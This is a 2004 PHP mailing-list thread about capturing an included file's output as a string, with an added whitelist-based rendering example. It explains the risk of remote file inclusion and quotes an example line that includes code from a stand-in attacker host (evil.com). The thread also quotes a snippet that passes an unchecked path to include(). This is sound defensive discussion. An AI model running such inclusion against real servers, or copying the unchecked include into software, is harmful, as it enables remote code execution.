[nycphp-talk] parse file, return as string
Tim Gales
tgales at tgaconnect.com
Thu Aug 19 13:28:12 EDT 2004
> From: David Mintz
> Sent: Thursday, August 19, 2004 12:07 PM
> To: NYPHP Talk
> Subject: Re: [nycphp-talk] parse file, return as string
>
>
> On Thu, 19 Aug 2004, inforequest wrote:
>
> > Fan, Wellington wfan-at-VillageVoice.com |nyphp 04/2004| wrote:
> >
> > >ob_start();
> > >@include($path_to_file);
> > >$contents = ob_get_clean();
> > >
> > >
> > be very wary of remote injections with that code.... include will
> > accept a URL in that variable. Explicitly allow
> > $path_to_file (is it
> > expected to always be on *your* domain?).
> >
>
> If you have allow_url_fopen disabled,
> include('http://evil.com/evil.php')
> will fail, right?
allow_url_fopen is a system-level configuration
directive and can only be set or unset in php.ini.
(You can't undo the setting dynamically at runtime for
security reasons.)

To keep out 'evil.php' you would have to
disallow opening URLs anywhere -- if you go
that route.

Like many security 'fixes', this cure
strikes me as worse than the illness.
(I think it would certainly put a damper
on using pcoms, for instance.)

I believe you are taking a 'blacklist'
approach -- trying to make sure an
'evil.php' doesn't affect you.

You might be better off taking
a 'whitelist' approach like the ones
Chris Shiflett speaks about from time
to time in his security workshops.
T. Gales & Associates
'Helping People Connect with Technology'
http://www.tgaconnect.com
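A whitelist version of the ob_start()/include()/ob_get_clean() snippet quoted in the thread, added here as an example and not code from any of the posters; the template directory, the key-to-file map and the render_template() name are assumed.

```php
<?php
// Added example (not from the thread): instead of handing a user-supplied
// $path_to_file to include(), map a short request key to a fixed set of
// local template files and refuse everything else. The request never
// supplies a path or URL, so allow_url_fopen never comes into play.

// Hypothetical template directory and key-to-file map (assumed names).
define('TEMPLATE_DIR', __DIR__ . '/templates');

$allowed_templates = array(
    'home'    => 'home.php',
    'about'   => 'about.php',
    'contact' => 'contact.php',
);

/**
 * Render a whitelisted template to a string.
 * Returns false if $key is not in the whitelist or if the resolved file
 * does not live inside TEMPLATE_DIR (e.g. a stray symlink).
 */
function render_template($key, array $allowed, array $vars = array())
{
    if (!isset($allowed[$key])) {
        return false;               // unknown key: never touch the filesystem
    }
    $real = realpath(TEMPLATE_DIR . '/' . $allowed[$key]);
    $base = realpath(TEMPLATE_DIR);
    if ($real === false || $base === false
        || strpos($real, $base . DIRECTORY_SEPARATOR) !== 0) {
        return false;               // file missing or outside the template dir
    }
    extract($vars, EXTR_SKIP);      // expose template variables, keep ours
    ob_start();
    include $real;                  // always a local, known file
    return ob_get_clean();
}

// Usage: the query string carries only a key, never a path.
$key = isset($_GET['page']) ? $_GET['page'] : 'home';
$contents = render_template($key, $allowed_templates, array('title' => 'Demo'));
if ($contents === false) {
    header('HTTP/1.0 404 Not Found');
    $contents = 'Page not found';
}
echo $contents;
```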